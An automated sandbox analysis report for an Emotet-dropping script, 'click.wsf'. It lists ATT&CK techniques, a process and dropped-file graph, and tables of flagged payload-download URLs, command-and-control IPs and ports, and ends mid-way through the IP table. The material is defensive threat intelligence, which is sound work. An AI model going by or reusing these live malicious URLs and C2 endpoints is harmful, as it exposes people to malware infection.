        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830321 Sample: click.wsf Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 31 129.232.188.93 xneeloZA South Africa 2->31 33 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil 2->33 35 37 other IPs or domains 2->35 57 Snort IDS alert for network traffic 2->57 59 Multi AV Scanner detection for domain / URL 2->59 61 Antivirus detection for URL or domain 2->61 63 4 other signatures 2->63 8 wscript.exe 4 2->8         started        13 OUTLOOK.EXE 46 3 2->13         started        signatures3 process4 dnsIp5 43 gomespontes.com.br 186.202.153.5, 443, 49729 LocawebServicosdeInternetSABR Brazil 8->43 45 penshorn.org 203.26.41.131, 443, 49727 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 8->45 53 2 other IPs or domains 8->53 23 C:\Users\user\Desktop\rad75349.tmp.dll, PE32+ 8->23 dropped 25 C:\Users\user\Desktop\rad1F9A4.tmp.dll, HTML 8->25 dropped 27 C:\Users\user\Desktop\click.wsf, ASCII 8->27 dropped 67 System process connects to network (likely due to code injection or exploit) 8->67 69 Benign windows process drops PE files 8->69 71 VBScript performs obfuscated calls to suspicious functions 8->71 15 regsvr32.exe 2 8->15         started        47 52.109.13.63, 443, 49720 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 13->47 49 52.109.76.141, 443, 49717 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 13->49 51 192.229.221.95, 49707, 49716, 49724 EDGECASTUS United States 13->51 file6 signatures7 process8 file9 29 C:\Windows\System32\...\xhwdmo.dll (copy), PE32+ 15->29 dropped 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->55 19 regsvr32.exe 15->19         started        signatures10 process11 dnsIp12 37 160.16.142.56, 8080 SAKURA-BSAKURAInternetIncJP Japan 19->37 39 91.121.146.47, 49731, 8080 OVHFR France 19->39 41 7 other IPs or domains 19->41 65 System process connects to network (likely due to code injection or exploit) 19->65 signatures13

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\Desktop\rad75349.tmp.dll79%ReversingLabsWin64.Trojan.Emotet
        C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy)79%ReversingLabsWin64.Trojan.Emotet

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        3.2.regsvr32.exe.460000.0.unpack100%AviraHEUR/AGEN.1215476Download File

        Domains

        SourceDetectionScannerLabelLink
        bbvoyage.com9%VirustotalBrowse
        gomespontes.com.br2%VirustotalBrowse
        penshorn.org14%VirustotalBrowse
        www.gomespontes.com.br5%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://softwareulike.com/cWIYxWMPkK/100%Avira URL Cloudmalware
        http://wrappixels.co0%Avira URL Cloudsafe
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0100%Avira URL Cloudmalware
        https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/0%Avira URL Cloudsafe
        https://160.16.142.56:8080/M0%Avira URL Cloudsafe
        https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnX100%Avira URL Cloudmalware
        https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/X100%Avira URL Cloudmalware
        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/100%Avira URL Cloudmalware
        https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bK100%Avira URL Cloudmalware
        https://104.168.155.143:8080/Y100%Avira URL Cloudmalware
        https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/z100%Avira URL Cloudmalware
        https://163.44.196.120:8080/100%Avira URL Cloudmalware
        https://91.121.146.47:8080/100%Avira URL Cloudmalware
        https://www.gomespontes.com.br/logs/pd/vM100%Avira URL Cloudmalware
        https://167.172.199.165:8080/l100%Avira URL Cloudmalware
        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006100%Avira URL Cloudmalware
        https://167.172.199.165:8080/100%Avira URL Cloudmalware
        https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgz100%Avira URL Cloudmalware
        https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        https://www.gomespontes.com.br/s0%Avira URL Cloudsafe
        http://ozmeydan.com/cekici/9/100%Avira URL Cloudmalware
        https://164.90.222.65/)100%Avira URL Cloudmalware
        https://www.gomespontes.com.br/logs/pd/100%Avira URL Cloudmalware
        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM100%Avira URL Cloudmalware
        https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz//0%Avira URL Cloudsafe
        https://penshorn.org/admin/Ses8712iGR8du/tM100%Avira URL Cloudmalware
        https://104.168.155.143:8080/4100%Avira URL Cloudmalware
        https://www.gomespontes.com.br/0%Avira URL Cloudsafe
        https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM100%Avira URL Cloudmalware
        https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/100%Avira URL Cloudmalware
        https://penshorn.org/admin/Ses8712iGR8du/100%Avira URL Cloudmalware
        http://softwareulike.com/cWIYxWMPkK/yM100%Avira URL Cloudmalware
        https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLL100%Avira URL Cloudmalware
        http://ozmeydan.com/cekici/9/xM100%Avira URL Cloudmalware
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dll100%Avira URL Cloudmalware
        https://104.168.155.143:8080/P100%Avira URL Cloudmalware
        https://www.gomespontes.com.br/logs/pd/l100%Avira URL Cloudmalware
        https://104.168.155.143:8080/100%Avira URL Cloudmalware
        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/100%Avira URL Cloudmalware
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM100%Avira URL Cloudmalware
        https://160.16.142.56:8080/0%Avira URL Cloudsafe
        https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(100%Avira URL Cloudmalware
        https://www.gomespontes.com.br/logs/pd/0w100%Avira URL Cloudmalware
        http://softwareulike.com/cWIYxWMPkK/_100%Avira URL Cloudmalware
        https://160.16.142.56:8080/)0%Avira URL Cloudsafe
        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bbvoyage.com
        		31.31.196.172
        		truetrueunknown
        gomespontes.com.br
        		186.202.153.5
        		truetrueunknown
        penshorn.org
        		203.26.41.131
        		truetrueunknown
        www.gomespontes.com.br
        		unknown
        		unknowntrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/true
        • Avira URL Cloud: malware
        		unknown
        https://www.gomespontes.com.br/logs/pd/true
        • Avira URL Cloud: malware
        		unknown
        https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/true
        • Avira URL Cloud: malware
        		unknown
        https://penshorn.org/admin/Ses8712iGR8du/true
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://wrappixels.cowscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        http://softwareulike.com/cWIYxWMPkK/wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        https://160.16.142.56:8080/Mregsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D68000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnXregsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/Xregsvr32.exe, 00000004.00000003.1868438531.0000000000D08000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://104.168.155.143:8080/Yregsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bKregsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://91.121.146.47:8080/regsvr32.exe, 00000004.00000002.2661608245.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://163.44.196.120:8080/regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/zregsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.gomespontes.com.br/logs/pd/vMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://167.172.199.165:8080/lregsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://167.172.199.165:8080/regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgzregsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.gomespontes.com.br/swscript.exe, 00000001.00000002.1554710807.000002D846747000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://ozmeydan.com/cekici/9/wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D8466F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        https://164.90.222.65/)regsvr32.exe, 00000004.00000003.2367342315.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz//regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://penshorn.org/admin/Ses8712iGR8du/tMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://104.168.155.143:8080/4regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.gomespontes.com.br/wscript.exe, 00000001.00000003.1537553114.000002D84656F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542696917.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1540601110.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1534710579.000002D846568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1545756551.000002D846570000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLLregsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        http://softwareulike.com/cWIYxWMPkK/yMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000002.2661608245.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dllwscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://ozmeydan.com/cekici/9/xMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://104.168.155.143:8080/Pregsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.gomespontes.com.br/logs/pd/lwscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://104.168.155.143:8080/regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://160.16.142.56:8080/regsvr32.exe, 00000004.00000002.2661608245.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.gomespontes.com.br/logs/pd/0wwscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D84672F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://softwareulike.com/cWIYxWMPkK/_wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://160.16.142.56:8080/)regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        52.109.13.63
        		unknownUnited States
        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
        110.232.117.186
        		unknownAustralia
        		56038RACKCORP-APRackCorpAUtrue
        103.132.242.26
        		unknownIndia
        		45117INPL-IN-APIshansNetworkINtrue
        104.168.155.143
        		unknownUnited States
        		54290HOSTWINDSUStrue
        79.137.35.198
        		unknownFrance
        		16276OVHFRtrue
        115.68.227.76
        		unknownKorea Republic of
        		38700SMILESERV-AS-KRSMILESERVKRtrue
        163.44.196.120
        		unknownSingapore
        		135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGtrue
        206.189.28.199
        		unknownUnited States
        		14061DIGITALOCEAN-ASNUStrue
        31.31.196.172
